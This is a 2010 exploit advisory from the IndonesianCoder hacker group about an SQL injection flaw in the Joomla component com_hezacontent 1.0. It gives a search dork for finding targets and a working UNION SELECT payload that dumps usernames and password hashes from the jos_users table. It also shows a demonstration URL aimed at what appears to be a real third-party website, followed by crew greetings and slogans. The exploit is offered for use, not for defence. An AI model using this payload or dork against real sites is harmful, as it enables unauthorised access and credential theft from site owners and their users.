[!]===========================================================================[!] [~] Joomla Component com_hezacontent SQL injection Vulnerability (id) [~] Author : kaMtiEz (kamzcrew@yahoo.com) [~] Homepage : http://www.indonesiancoder.com [~] Date : 9 march, 2010 [!]===========================================================================[!] [ Software Information ] [+] Vendor : ttp://joomlacode.org/ [+] Price : free [+] Vulnerability : SQL [+] Dork : inurl:"CIHUY" ;) [+] Download : http://joomlacode.org/gf/download/frsrelease/11313/46163/com_hezacontent.zip [+] Version : 1.0 [!]===========================================================================[!] [ Vulnerable File ] http://127.0.0.1/index.php?option=com_hezacontent&view=item&id=[INDONESIANCODER] [ XpL ] -1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users-- [ d3m0 ] http://bbh.coadesign.org/index.php?option=com_hezacontent&view=item&id=-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users-- dan lain sebagainya ;] [!]===========================================================================[!] [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack [+] Contrex,onthel,yasea,bugs,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue- [+] #becak - #indonesiancoder - #kill-9 [ NOTE ] [+] Rawk ! [+] gonzhack : buruan kesini dodolllllllllllllllllll !! [ QUOTE ] [+] we are not dead INDONESIANCODER stil r0x [+] nothing secure .. [+] ./e0f